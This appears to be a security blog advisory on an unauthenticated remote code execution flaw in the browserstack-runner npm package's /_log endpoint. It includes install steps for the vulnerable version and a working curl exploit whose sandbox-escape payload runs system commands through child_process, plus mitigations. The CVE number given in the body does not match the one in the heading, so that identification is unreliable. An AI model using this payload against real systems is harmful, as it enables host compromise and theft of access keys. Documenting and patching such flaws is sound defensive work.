Listen to this Post
Technical Analysis of CVE-2026-49143
CVE-2024-29131 is a critical vulnerability in the `browserstack-runner` npm package, affecting versions up to and including 0.9.5. The flaw lies in the HTTP handler for the `/_log` endpoint, located in `lib/server.js` at lines 491–515. When `browserstack-runner` starts, it creates an HTTP server on port 8888 (configurable) that listens on all network interfaces (0.0.0.0), making it accessible from anywhere on the network.
The `/_log` endpoint accepts POST requests and processes the JSON body. The vulnerable code is as follows:
var context = { input: query.arguments, format: util.format, output: '' };
var tryEvalOrString = 'function (arg) { try { return eval(\'o = \' + arg); } catch (e) { return arg; } }';
vm.runInNewContext('output = format.apply(null, input.map(' + tryEvalOrString + '));', context);
This code takes user-supplied `arguments` from the JSON request and passes them into a Node.js VM sandbox using vm.runInNewContext(), combined with eval(). The Node.js documentation explicitly states that the `vm` module is not a security mechanism, yet the code treats it as one.
The `context` object includes a reference to util.format, which is a host-context Function. Attackers can leverage this to break out of the sandbox by using `this.constructor.constructor(“return process”)()` to gain access to the host process. Unlike the `/_progress` and `/_report` handlers, which verify worker UUID authentication, the `/_log` handler has no authentication checks. This allows an attacker to craft a JSON request that executes arbitrary system commands on the host machine. The attack window exists for the duration of the test run, typically 1–15 minutes, but during this time, an attacker can fully compromise the system, including accessing the BrowserStack access key from environment variables.
DailyCVE Form:
Platform: browserstack-runner
Version: 0.9.5
Vulnerability: Unauthenticated RCE
Severity: High (8.7)
Date: 2026-06-02
Prediction: 2026-06-15
What Undercode Say
Install and run vulnerable version npm install -g [email protected] Create minimal test files echo '<html><body>t</body></html>' > t.html echo '{"username":"X","key":"X","test_path":"t.html","test_framework":"qunit","browsers":[]}' > browserstack.json Start the runner node bin/runner.js
Exploit command (Terminal 2)
curl -s http://127.0.0.1:8888/_log \
-H "Content-Type: application/json" \
-d '{"arguments":["this.constructor.constructor(\"return process.mainModule.require(`child_process`).execSync(`id`).toString()\")()"]}'
Output demonstrates successful arbitrary command execution (`uid=1000(user) …`).
Exploit
The exploit works by chaining JavaScript prototype manipulation. The attacker injects a payload as a `”arguments”` array into the JSON body. The payload `this.constructor.constructor(“return process.mainModule.require(‘child_process’).execSync(‘id’).toString()”)()` leverages the host-context `Function` reference from `util.format` to escape the VM. From there, `process.mainModule.require(‘child_process’).execSync()` executes arbitrary system commands. The result is returned in the `output` field of the `context` object, which is then sent back to the attacker.
Protection
Short-term (Mitigation): Restrict network access to the vulnerable `/_log` endpoint using firewall rules or network segmentation to prevent unauthenticated access.
Long-term (Remediation):
Remove `eval()` and `vm.runInNewContext()` from the `/_log` handler entirely. Use `JSON.stringify()` for safe logging instead.
Implement UUID authentication for the `/_log` handler, matching the pattern used by `/_progress` and /_report.
Reconfigure the HTTP server to listen only on `127.0.0.1` instead of 0.0.0.0.
Avoid using Node.js standard `vm` modules or `eval()` routines to parse user-controlled input.
Impact
CVE-2026-49143 has a CVSS v4.0 score of 8.7 (High) with the vector CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. The attack vector is adjacent network, meaning an attacker must be on the same network segment as the developer running the vulnerable tool. The attack complexity is Low, requires no privileges or user interaction, and results in total loss of confidentiality, integrity, and availability (High impact on the vulnerable system). The presence of a public Proof-of-Concept (PoC) exploit makes this vulnerability a significant risk for any developer or CI/CD environment using browserstack-runner. The attack window, though limited to the duration of a test run (typically 1–15 minutes), offers a full system compromise, including access to any credentials (e.g., BrowserStack access keys) present in the environment.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
